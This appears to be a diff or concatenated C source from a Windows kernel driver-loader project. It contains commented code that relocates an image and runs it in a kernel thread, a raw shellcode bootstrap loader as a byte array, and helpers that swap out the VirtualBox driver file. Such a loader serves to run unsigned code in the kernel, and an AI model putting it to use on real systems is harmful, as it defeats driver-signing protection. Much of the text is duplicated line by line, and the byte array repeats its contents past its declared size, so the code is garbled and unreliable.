rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image +
popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
delta = (DWORD_PTR)exbuffer - popth->ImageBase;
c = 0;
rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
delta = (DWORD_PTR)exbuffer - popth->ImageBase;
c = 0;
while (c < rsz) {
p = sizeof(IMAGE_BASE_RELOCATION);
chains = (LPWORD)((PBYTE)rel + p);
while (c < rsz) {
p = sizeof(IMAGE_BASE_RELOCATION);
chains = (LPWORD)((PBYTE)rel + p);
while (p < rel->SizeOfBlock) {
while (p < rel->SizeOfBlock) {
switch (*chains >> 12) {
case IMAGE_REL_BASED_HIGHLOW:
*(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta;
break;
case IMAGE_REL_BASED_DIR64:
*(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta;
break;
}
switch (*chains >> 12) {
case IMAGE_REL_BASED_HIGHLOW:
*(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta;
break;
case IMAGE_REL_BASED_DIR64:
*(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta;
break;
}
chains++;
p += sizeof(WORD);
}
chains++;
p += sizeof(WORD);
}
c += rel->SizeOfBlock;
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock);
}
}
c += rel->SizeOfBlock;
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock);
}
}
isz >>= 3;
for (pos = 0; pos < isz; pos++)
((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos];
isz >>= 3;
for (pos = 0; pos < isz; pos++)
((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos];
InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL,
(PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL);
InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL,
(PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL);
}
*/
static const unsigned char TDLBootstrapLoader_code[415] = {
0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2,
0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF,
0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C,
0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00,
0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00,
0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F,
0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84,
0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B,
0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89,
0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00,
0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43,
0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9,
0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C,
0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C,
0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48,
0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0,
0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00,
0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48,
0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75,
0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44,
0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58,
0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24,
0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6,
0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41,
0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3
0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2,
0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF,
0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C,
0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00,
0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00,
0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F,
0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84,
0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B,
0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89,
0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00,
0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43,
0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9,
0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C,
0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C,
0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48,
0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0,
0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00,
0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48,
0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75,
0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44,
0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58,
0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24,
0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6,
0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41,
0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3
};


@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: SUP.C
*
* VERSION: 1.00
* VERSION: 1.10
*
* DATE: 01 Feb 2016
* DATE: 17 Apr 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -25,43 +25,43 @@
*
*/
PVOID supGetSystemInfo(
_In_ SYSTEM_INFORMATION_CLASS InfoClass
)
_In_ SYSTEM_INFORMATION_CLASS InfoClass
)
{
INT c = 0;
PVOID Buffer = NULL;
ULONG Size = 0x1000;
NTSTATUS status;
ULONG memIO;
PVOID hHeap = NtCurrentPeb()->ProcessHeap;
INT c = 0;
PVOID Buffer = NULL;
ULONG Size = 0x1000;
NTSTATUS status;
ULONG memIO;
PVOID hHeap = NtCurrentPeb()->ProcessHeap;
do {
Buffer = RtlAllocateHeap(hHeap, HEAP_ZERO_MEMORY, (SIZE_T)Size);
if (Buffer != NULL) {
status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO);
}
else {
return NULL;
}
if (status == STATUS_INFO_LENGTH_MISMATCH) {
RtlFreeHeap(hHeap, 0, Buffer);
Size *= 2;
c++;
if (c > 100) {
status = STATUS_SECRET_TOO_LONG;
break;
}
}
} while (status == STATUS_INFO_LENGTH_MISMATCH);
do {
Buffer = RtlAllocateHeap(hHeap, HEAP_ZERO_MEMORY, (SIZE_T)Size);
if (Buffer != NULL) {
status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO);
}
else {
return NULL;
}
if (status == STATUS_INFO_LENGTH_MISMATCH) {
RtlFreeHeap(hHeap, 0, Buffer);
Size *= 2;
c++;
if (c > 100) {
status = STATUS_SECRET_TOO_LONG;
break;
}
}
} while (status == STATUS_INFO_LENGTH_MISMATCH);
if (NT_SUCCESS(status)) {
return Buffer;
}
if (NT_SUCCESS(status)) {
return Buffer;
}
if (Buffer) {
RtlFreeHeap(hHeap, 0, Buffer);
}
return NULL;
if (Buffer) {
RtlFreeHeap(hHeap, 0, Buffer);
}
return NULL;
}
/*
@ -73,19 +73,19 @@ PVOID supGetSystemInfo(
*
*/
ULONG_PTR supGetNtOsBase(
VOID
)
VOID
)
{
PRTL_PROCESS_MODULES miSpace;
ULONG_PTR NtOsBase = 0;
PRTL_PROCESS_MODULES miSpace;
ULONG_PTR NtOsBase = 0;
miSpace = supGetSystemInfo(SystemModuleInformation);
while (miSpace != NULL) {
NtOsBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace);
break;
}
return NtOsBase;
miSpace = supGetSystemInfo(SystemModuleInformation);
while (miSpace != NULL) {
NtOsBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace);
break;
}
return NtOsBase;
}
/*
@ -97,34 +97,34 @@ ULONG_PTR supGetNtOsBase(
*
*/
PBYTE supQueryResourceData(
_In_ ULONG_PTR ResourceId,
_In_ PVOID DllHandle,
_In_ PULONG DataSize
)
_In_ ULONG_PTR ResourceId,
_In_ PVOID DllHandle,
_In_ PULONG DataSize
)
{
NTSTATUS status;
ULONG_PTR IdPath[3];
IMAGE_RESOURCE_DATA_ENTRY *DataEntry;
PBYTE Data = NULL;
ULONG SizeOfData = 0;
NTSTATUS status;
ULONG_PTR IdPath[3];
IMAGE_RESOURCE_DATA_ENTRY *DataEntry;
PBYTE Data = NULL;
ULONG SizeOfData = 0;
if (DllHandle != NULL) {
if (DllHandle != NULL) {
IdPath[0] = (ULONG_PTR)RT_RCDATA; //type
IdPath[1] = ResourceId; //id
IdPath[2] = 0; //lang
IdPath[0] = (ULONG_PTR)RT_RCDATA; //type
IdPath[1] = ResourceId; //id
IdPath[2] = 0; //lang
status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry);
if (NT_SUCCESS(status)) {
status = LdrAccessResource(DllHandle, DataEntry, &Data, &SizeOfData);
if (NT_SUCCESS(status)) {
if (DataSize) {
*DataSize = SizeOfData;
}
}
}
}
return Data;
status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry);
if (NT_SUCCESS(status)) {
status = LdrAccessResource(DllHandle, DataEntry, &Data, &SizeOfData);
if (NT_SUCCESS(status)) {
if (DataSize) {
*DataSize = SizeOfData;
}
}
}
}
return Data;
}
/*
@ -136,39 +136,39 @@ PBYTE supQueryResourceData(
*
*/
BOOL supBackupVBoxDrv(
_In_ BOOL bRestore
)
_In_ BOOL bRestore
)
{
BOOL bResult = FALSE;
WCHAR szOldDriverName[MAX_PATH * 2];
WCHAR szNewDriverName[MAX_PATH * 2];
WCHAR szDriverDirName[MAX_PATH * 2];
BOOL bResult = FALSE;
WCHAR szOldDriverName[MAX_PATH * 2];
WCHAR szNewDriverName[MAX_PATH * 2];
WCHAR szDriverDirName[MAX_PATH * 2];
if (!GetSystemDirectory(szDriverDirName, MAX_PATH)) {
return FALSE;
}
if (!GetSystemDirectory(szDriverDirName, MAX_PATH)) {
return FALSE;
}
_strcat(szDriverDirName, TEXT("\\drivers\\"));
_strcat(szDriverDirName, TEXT("\\drivers\\"));
if (bRestore) {
_strcpy(szOldDriverName, szDriverDirName);
_strcat(szOldDriverName, TEXT("VBoxDrv.backup"));
if (PathFileExists(szOldDriverName)) {
_strcpy(szNewDriverName, szDriverDirName);
_strcat(szNewDriverName, TEXT("VBoxDrv.sys"));
bResult = MoveFileEx(szOldDriverName, szNewDriverName,
MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH);
}
}
else {
_strcpy(szOldDriverName, szDriverDirName);
_strcat(szOldDriverName, TEXT("VBoxDrv.sys"));
_strcpy(szNewDriverName, szDriverDirName);
_strcat(szNewDriverName, TEXT("VBoxDrv.backup"));
bResult = MoveFileEx(szOldDriverName, szNewDriverName,
MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH);
}
return bResult;
if (bRestore) {
_strcpy(szOldDriverName, szDriverDirName);
_strcat(szOldDriverName, TEXT("VBoxDrv.backup"));
if (PathFileExists(szOldDriverName)) {
_strcpy(szNewDriverName, szDriverDirName);
_strcat(szNewDriverName, TEXT("VBoxDrv.sys"));
bResult = MoveFileEx(szOldDriverName, szNewDriverName,
MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH);
}
}
else {
_strcpy(szOldDriverName, szDriverDirName);
_strcat(szOldDriverName, TEXT("VBoxDrv.sys"));
_strcpy(szNewDriverName, szDriverDirName);
_strcat(szNewDriverName, TEXT("VBoxDrv.backup"));
bResult = MoveFileEx(szOldDriverName, szNewDriverName,
MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH);
}
return bResult;
}
/*
@ -180,93 +180,93 @@ BOOL supBackupVBoxDrv(
*
*/
SIZE_T supWriteBufferToFile(
_In_ PWSTR lpFileName,
_In_ PVOID Buffer,
_In_ SIZE_T Size,
_In_ BOOL Flush,
_In_ BOOL Append
)
_In_ PWSTR lpFileName,
_In_ PVOID Buffer,
_In_ SIZE_T Size,
_In_ BOOL Flush,
_In_ BOOL Append
)
{
NTSTATUS Status;
DWORD dwFlag;
HANDLE hFile = NULL;
OBJECT_ATTRIBUTES attr;
UNICODE_STRING NtFileName;
IO_STATUS_BLOCK IoStatus;
LARGE_INTEGER Position;
ACCESS_MASK DesiredAccess;
PLARGE_INTEGER pPosition = NULL;
ULONG_PTR nBlocks, BlockIndex;
ULONG BlockSize, RemainingSize;
PBYTE ptr = (PBYTE)Buffer;
SIZE_T BytesWritten = 0;
NTSTATUS Status;
DWORD dwFlag;
HANDLE hFile = NULL;
OBJECT_ATTRIBUTES attr;
UNICODE_STRING NtFileName;
IO_STATUS_BLOCK IoStatus;
LARGE_INTEGER Position;
ACCESS_MASK DesiredAccess;
PLARGE_INTEGER pPosition = NULL;
ULONG_PTR nBlocks, BlockIndex;
ULONG BlockSize, RemainingSize;
PBYTE ptr = (PBYTE)Buffer;
SIZE_T BytesWritten = 0;
if (RtlDosPathNameToNtPathName_U(lpFileName, &NtFileName, NULL, NULL) == FALSE)
return 0;
if (RtlDosPathNameToNtPathName_U(lpFileName, &NtFileName, NULL, NULL) == FALSE)
return 0;
DesiredAccess = FILE_WRITE_ACCESS | SYNCHRONIZE;
dwFlag = FILE_OVERWRITE_IF;
DesiredAccess = FILE_WRITE_ACCESS | SYNCHRONIZE;
dwFlag = FILE_OVERWRITE_IF;
if (Append == TRUE) {
DesiredAccess |= FILE_READ_ACCESS;
dwFlag = FILE_OPEN_IF;
}
if (Append != FALSE) {
DesiredAccess |= FILE_READ_ACCESS;
dwFlag = FILE_OPEN_IF;
}
InitializeObjectAttributes(&attr, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL);
InitializeObjectAttributes(&attr, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL);
__try {
Status = NtCreateFile(&hFile, DesiredAccess, &attr,
&IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag,
FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0);
__try {
Status = NtCreateFile(&hFile, DesiredAccess, &attr,
&IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag,
FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0);
if (!NT_SUCCESS(Status))
__leave;
if (!NT_SUCCESS(Status))
__leave;
pPosition = NULL;
pPosition = NULL;
if (Append == TRUE) {
Position.LowPart = FILE_WRITE_TO_END_OF_FILE;
Position.HighPart = -1;
pPosition = &Position;
}
if (Append != FALSE) {
Position.LowPart = FILE_WRITE_TO_END_OF_FILE;
Position.HighPart = -1;
pPosition = &Position;
}
if (Size < 0x80000000) {
BlockSize = (ULONG)Size;
Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL);
if (!NT_SUCCESS(Status))
__leave;
if (Size < 0x80000000) {
BlockSize = (ULONG)Size;
Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL);
if (!NT_SUCCESS(Status))
__leave;
BytesWritten += IoStatus.Information;
}
else {
BlockSize = 0x7FFFFFFF;
nBlocks = (Size / BlockSize);
for (BlockIndex = 0; BlockIndex < nBlocks; BlockIndex++) {
BytesWritten += IoStatus.Information;
}
else {
BlockSize = 0x7FFFFFFF;
nBlocks = (Size / BlockSize);
for (BlockIndex = 0; BlockIndex < nBlocks; BlockIndex++) {
Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL);
if (!NT_SUCCESS(Status))
__leave;
Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL);
if (!NT_SUCCESS(Status))
__leave;
ptr += BlockSize;
BytesWritten += IoStatus.Information;
}
RemainingSize = Size % BlockSize;
if (RemainingSize != 0) {
Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, RemainingSize, pPosition, NULL);
if (!NT_SUCCESS(Status))
__leave;
BytesWritten += IoStatus.Information;
}
}
}
__finally {
if (hFile != NULL) {
if (Flush == TRUE) NtFlushBuffersFile(hFile, &IoStatus);
NtClose(hFile);
}
RtlFreeUnicodeString(&NtFileName);
}
return BytesWritten;
ptr += BlockSize;
BytesWritten += IoStatus.Information;
}
RemainingSize = (ULONG)(Size % BlockSize);
if (RemainingSize != 0) {
Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, RemainingSize, pPosition, NULL);
if (!NT_SUCCESS(Status))
__leave;
BytesWritten += IoStatus.Information;
}
}
}
__finally {
if (hFile != NULL) {
if (Flush != FALSE) NtFlushBuffersFile(hFile, &IoStatus);
NtClose(hFile);
}
RtlFreeUnicodeString(&NtFileName);
}
return BytesWritten;
}
/*
@ -278,30 +278,30 @@ SIZE_T supWriteBufferToFile(
*
*/
NTSTATUS NTAPI supDetectObjectCallback(
_In_ POBJECT_DIRECTORY_INFORMATION Entry,
_In_ PVOID CallbackParam
)
_In_ POBJECT_DIRECTORY_INFORMATION Entry,
_In_ PVOID CallbackParam
)
{
POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam;
POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam;
if (Entry == NULL) {
return STATUS_INVALID_PARAMETER_1;
}
if (Entry == NULL) {
return STATUS_INVALID_PARAMETER_1;
}
if (CallbackParam == NULL) {
return STATUS_INVALID_PARAMETER_2;
}
if (CallbackParam == NULL) {
return STATUS_INVALID_PARAMETER_2;
}
if (Param->Buffer == NULL || Param->BufferSize == 0) {
return STATUS_MEMORY_NOT_ALLOCATED;
}
if (Param->Buffer == NULL || Param->BufferSize == 0) {
return STATUS_MEMORY_NOT_ALLOCATED;
}
if (Entry->Name.Buffer) {
if (_strcmpi_w(Entry->Name.Buffer, Param->Buffer) == 0) {
return STATUS_SUCCESS;
}
}
return STATUS_UNSUCCESSFUL;
if (Entry->Name.Buffer) {
if (_strcmpi_w(Entry->Name.Buffer, Param->Buffer) == 0) {
return STATUS_SUCCESS;
}
}
return STATUS_UNSUCCESSFUL;
}
/*
@ -313,87 +313,87 @@ NTSTATUS NTAPI supDetectObjectCallback(
*
*/
NTSTATUS NTAPI supEnumSystemObjects(
_In_opt_ LPWSTR pwszRootDirectory,
_In_opt_ HANDLE hRootDirectory,
_In_ PENUMOBJECTSCALLBACK CallbackProc,
_In_opt_ PVOID CallbackParam
)
_In_opt_ LPWSTR pwszRootDirectory,
_In_opt_ HANDLE hRootDirectory,
_In_ PENUMOBJECTSCALLBACK CallbackProc,
_In_opt_ PVOID CallbackParam
)
{
BOOL cond = TRUE;
ULONG ctx, rlen;
HANDLE hDirectory = NULL;
NTSTATUS status;
NTSTATUS CallbackStatus;
OBJECT_ATTRIBUTES attr;
UNICODE_STRING sname;
BOOL cond = TRUE;
ULONG ctx, rlen;
HANDLE hDirectory = NULL;
NTSTATUS status;
NTSTATUS CallbackStatus;
OBJECT_ATTRIBUTES attr;
UNICODE_STRING sname;
POBJECT_DIRECTORY_INFORMATION objinf;
POBJECT_DIRECTORY_INFORMATION objinf;
if (CallbackProc == NULL) {
return STATUS_INVALID_PARAMETER_4;
}
if (CallbackProc == NULL) {
return STATUS_INVALID_PARAMETER_4;
}
status = STATUS_UNSUCCESSFUL;
status = STATUS_UNSUCCESSFUL;
__try {
__try {
// We can use root directory.
if (pwszRootDirectory != NULL) {
RtlSecureZeroMemory(&sname, sizeof(sname));
RtlInitUnicodeString(&sname, pwszRootDirectory);
InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL);
status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr);
if (!NT_SUCCESS(status)) {
return status;
}
}
else {
if (hRootDirectory == NULL) {
return STATUS_INVALID_PARAMETER_2;
}
hDirectory = hRootDirectory;
}
// We can use root directory.
if (pwszRootDirectory != NULL) {
RtlSecureZeroMemory(&sname, sizeof(sname));
RtlInitUnicodeString(&sname, pwszRootDirectory);
InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL);
status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr);
if (!NT_SUCCESS(status)) {
return status;
}
}
else {
if (hRootDirectory == NULL) {
return STATUS_INVALID_PARAMETER_2;
}
hDirectory = hRootDirectory;
}
// Enumerate objects in directory.
ctx = 0;
do {
// Enumerate objects in directory.
ctx = 0;
do {
rlen = 0;
status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen);
if (status != STATUS_BUFFER_TOO_SMALL)
break;
rlen = 0;
status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen);
if (status != STATUS_BUFFER_TOO_SMALL)
break;
objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen);
if (objinf == NULL)
break;
objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen);
if (objinf == NULL)
break;
status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen);
if (!NT_SUCCESS(status)) {
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
break;
}
status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen);
if (!NT_SUCCESS(status)) {
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
break;
}
CallbackStatus = CallbackProc(objinf, CallbackParam);
CallbackStatus = CallbackProc(objinf, CallbackParam);
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
if (NT_SUCCESS(CallbackStatus)) {
status = STATUS_SUCCESS;
break;
}
if (NT_SUCCESS(CallbackStatus)) {
status = STATUS_SUCCESS;
break;
}
} while (cond);
} while (cond);
if (hDirectory != NULL) {
NtClose(hDirectory);
}
if (hDirectory != NULL) {
NtClose(hDirectory);
}
}
__except (EXCEPTION_EXECUTE_HANDLER) {
status = STATUS_ACCESS_VIOLATION;
}
}
__except (EXCEPTION_EXECUTE_HANDLER) {
status = STATUS_ACCESS_VIOLATION;
}
return status;
return status;
}
/*
@ -405,18 +405,18 @@ NTSTATUS NTAPI supEnumSystemObjects(
*
*/
BOOL supIsObjectExists(
_In_ LPWSTR RootDirectory,
_In_ LPWSTR ObjectName
)
_In_ LPWSTR RootDirectory,
_In_ LPWSTR ObjectName
)
{
OBJSCANPARAM Param;
OBJSCANPARAM Param;
if (ObjectName == NULL) {
return FALSE;
}
if (ObjectName == NULL) {
return FALSE;
}
Param.Buffer = ObjectName;
Param.BufferSize = (ULONG)_strlen(ObjectName);
Param.Buffer = ObjectName;
Param.BufferSize = (ULONG)_strlen(ObjectName);
